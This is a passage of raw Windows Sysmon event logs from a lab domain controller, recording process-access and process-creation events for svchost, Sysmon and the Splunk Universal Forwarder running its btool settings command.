13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3E00-00000000A301}37403744C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.158{59A5CD1D-8E58-6005-3F00-00000000A301}3760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3D00-00000000A301}37283732C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.149{59A5CD1D-8E58-6005-3E00-00000000A301}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.142{59A5CD1D-8E58-6005-3D00-00000000A301}3728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.126{59A5CD1D-8E58-6005-3B00-00000000A301}36963700C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.129{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program 